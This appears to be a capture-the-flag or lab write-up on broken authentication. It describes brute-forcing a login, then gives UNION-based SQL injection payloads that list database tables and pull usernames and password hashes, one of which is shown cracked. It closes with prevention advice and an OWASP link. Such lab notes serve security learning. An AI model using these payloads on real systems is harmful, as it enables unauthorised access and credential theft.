# BROKEN AUTHENTICATION

## Explanation

**Bruteforce way**
- small bash script which loops through most common password and usernames
  - => root / shadow works and gets us the flag

**The passwords were available through sql injection as well.**
- Union injection to retrieve all the tables / columns
  - 1 AND 1=2 UNION SELECT table_schema, table_name FROM information_schema.tables
  - 1 AND 1=2 UNION SELECT table_name, column_name, 1 FROM information_schema.columns
  - 1 AND 1=2 UNION SELECT username, password FROM Member_Brute_Force.db_default
- => 3bf1114a986ba87ed28fc1b5884fc2f8 == shadow

## Exploitation

> - Automated attacks such as bruteforcing with rainbow tables
> - Test for default passwords
> - Weak password policy

## Prevention

> In order to mitigate this risk, implement :
>  - strong password policy
>  - do not allow default credentials
>  - multi factor authentication
>  - limitation on failed login attemps

## Documentation

[OWASP - Authentication](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html)